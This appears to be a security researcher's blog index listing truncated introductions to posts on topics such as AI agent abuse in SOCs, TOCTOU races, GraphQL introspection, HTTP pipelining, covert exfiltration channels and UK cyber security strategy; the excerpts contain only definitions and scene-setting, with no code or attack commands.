AI agents (utilizing LLMs and RAG) are being used within SOCs and SIEMs to both help identify attacks and assist analysts with working more efficiently; however, I’ve done a little bit of research one sunny British afternoon and found that these agents can be abused by attackers and made to go rogue. They can be made to modify the details of an attack, hide attacks altogether, or create fictitious events to cause a distraction while the real target is attacked instead. Furthermore, if the LLM ha continue reading

I think you’ll agree with me that growth in the AI landscape is pretty full on at the moment. I go to sleep and wake up only to find more models have been released, each one outdoing the last one by several orders of magnitude, like some kind of Steve Jobs’ presentation on the latest product release, but on a daily loop. With these rapid developments, security must keep up or it gets left behind. My two decades spent in offensive application security have shown me that unfortunately features typ continue reading

The concept of “principle of least privilege” has been about for a long time, in fact, it is older than me; there are papers [1] [2] [3] from the 70’s which discuss it: “Every program and every user of the system should operate using the least set of privileges necessary to complete the job.” (The protection of information in computer systems, Saltzer and Schroeder 1974) As what the quote says above, it means to give only the bare minimum level of access to a user (or process) which is require continue reading

It was a cold and wet Thursday morning, sometime in early 2006. There I was sitting at the very top back row of an awe-inspiring lecture theatre inside Royal Holloway’s Founder’s Building while studying for my MSc in Information Security. Back then, the lecture in progress was from the software security module. The first rule of software security back then was never to trust user inputs. In software, there are sources — where we take the data from (usually the user), and there are sinks — where continue reading

Hello there! Thanks for stopping by. Let me get straight into it and start things off with what a checksum is to be inclusive of all audiences here, from Wikipedia [1]: “A checksum is a small-sized block of data derived from another block of digital data for the purpose of detecting errors that may have been introduced during its transmission or storage. By themselves, checksums are often used to verify data integrity but are not relied upon to verify data authenticity.” The procedure that gener continue reading

Allow me to set the scene and start proceedings off with a definition of an integer overflow, according to Wikipedia: “…an integer overflow occurs when an arithmetic operation attempts to create a numeric value that is outside of the range that can be represented with a given number of digits – either higher than the maximum or lower than the minimum representable value.” [1] To be inclusive of all audiences here, in software security we’ve got sources (typically user input) and sinks – where th continue reading

This is another one of those blog posts from me about how I independently carried out some security research into a thing and found something, but I was just too late to the party once again [1]. However, I want to share the journey because I still think there is some value in doing so. I want to take you on that journey and have you experience the excitement and adrenaline rush when an idea, a construct, that abuse/misuse case you had in your head gets to a working proof of concept and is continue reading

When I’m carrying out security research into a thing, I generally don’t like to Google prior research right away. I know, this completely goes against how you would (and should!) carry out any research; starting with a literature review to find the lay of the land and existing research done in the area to then expand upon. However, I have a habit of getting that light bulb idea or concept and acting upon it right away, rolling up my sleeves and putting my wellies on, ready to get dirty. This som continue reading

I was looking at my watch last week and my attention was moved towards the seconds over at the right of the watch face, incrementing nicely along as you’d expect. Now, I don’t know if I’d just spent too long staring at a debugger screen or if it was something in the air, but an idea dawned on me, related to all things command and control, data exfiltration, etc. When I saw “41,” I saw “A,” which is the hexadecimal representation for it, “42” being “B” and so on – a lot of pentesters will rel continue reading

Allow me to summarize this blog post with Lego… I’ve always had a great love of all things wireless/RF for as long as I can remember. The ability to send frames/packets of data out into the world (the airwaves!) for anyone with the right equipment and looking at the right frequency to pluck them out and reconstruct them - amazing! I am still the proud owner of both ORiNOCO Gold and Silver PCMCIA cards, these two bad boys defined wireless hacking back in the early 2000’s. Now, for p continue reading

I’ve been pentesting applications for nearly two decades now and throughout that time you get to see trends. One of these is the gradual adoption of Single Sign-On (SSO) in the corporate environment for lots of previously isolated applications. These applications would usually have their own user database and the users (the employees) would need to authenticate directly to them with specific ‘local’ credentials. With this setup comes varying password expiry times, complexity requirements, etc. M continue reading

As is tradition with my blog posts, let’s start off a definition of what HTTP pipelining is all about. “HTTP pipelining is a feature of HTTP/1.1 which allows multiple HTTP requests to be sent over a single TCP connection without waiting for the corresponding responses. HTTP/1.1 requires servers to respond to pipelined requests correctly, with non-pipelined but valid responses even if [the] server does not support HTTP pipelining. Despite this requirement, many legacy HTTP/1.1 serv continue reading

For those wondering what GraphQL is… “GraphQL is a query language for your API, and a server-side runtime for executing queries using a type system you define for your data. GraphQL isn’t tied to any specific database or storage engine and is instead backed by your existing code and data.” (Taken from https://graphql.org/learn/) For those who are already familiar with GraphQL, especially from a security perspective, the first thing we tend to think about is “Introspection” – the ability for a us continue reading

A user impersonation feature typically allows a privileged user, such as an administrator, but typically these days, support teams, to sign into an application as a specific user without needing to know the user’s password. This feature allows support teams to see the application as the user would see it, often in relation to following a user journey in the context of that user, in order to see the same error message a user is receiving with a view to resolving the issue. I’ve also seen this fun continue reading

Time-Of-Check Time-Of-Use (TOCTOU) and Race Conditions? What’s it all about? According to Wikipedia, “In software development, time-of-check to time-of-use (TOCTOU, TOCTTOU or TOC/TOU) is a class of software bugs caused by a race condition involving the checking of the state of a part of a system (such as a security credential) and the use of the results of that check.” From MITRE’s Common Weakness Enumeration (CWE), it states this about TOCTOU (CWE-367), “The product checks the state of a continue reading

A little bit of background for those not familiar with chfn… “chfn (change finger) is used to change your finger information. This information is stored in the /etc/passwd file and is displayed by the finger program. The Linux finger command will display four pieces of information that can be changed by chfn; your real name, your work room and phone, and your home phone.” (from https://man7.org/linux/man-pages/man1/chfn.1.html) Now for some history. Two years ago, I picked out chfn as continue reading

Picture the scene, you’re on an application penetration test (as a normal user) and you’ve managed to bag yourself some password hashes from the application. This can happen in various ways but in my experience, this is often the result of either a SQL injection vulnerability (resulting in the dumping of the users table) or finding that the application (or associated API) spits these hashes out in responses (because they are only hashes and what could go wrong!?). An Insecure Direct Object Refer continue reading

Back in February 2013 I spent some time (armed with coffee) going through every annual report of each Financial Times Stock Exchange 100 (FTSE100) company to determine which of them were giving a mention to cybersecurity / information security, typically in their principal risks and uncertainties section as a risk, but also elsewhere in the report. The objective for this was two-fold. Firstly, to understand whether cybersecurity was actively being discussed at a board level. Secondly, to id continue reading

Picture the scene - you’re on a penetration test, somehow you’ve got hold of a bunch of .NET assemblies for the application you’re assessing, be it a web application or thick client. On a thick client test, getting a hold of these files is somewhat trivial as they’re right there in front of you. On a web application test, however, things are not as easy - but it still is possible, depending on permissions and such. I won’t go into “the how-to” in order get these in this blog post, instead I will continue reading

I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information continue reading

In November 2011, the UK Government launched its Cyber Security Strategy in hopes of placing the issue of data and systems security on the agenda at a board level. The government presented executive briefings on cyber security to U.K. businesses, setting out four main objectives: Make the U.K. one of the most secure places in the world to do business, make the U.K. more resilient to cyberattacks, shape a more stable cyberspace, and build a foundation of knowledge, skills and capabilities to supp continue reading

The UK Government is “committed to helping reduce vulnerability to attacks and ensure that the UK is the safest place to do business”. [1] It’s all part of the much talked about UK Cyber Security Strategy [2]. One strand of the strategy was an executive briefing on cyber security to UK businesses – which included a top 10 focus areas for businesses to concentrate on. Within that briefing document, Ian Lovain (The Director of GCHQ) put it most frankly, “Value, Revenue and Credibility are at stake continue reading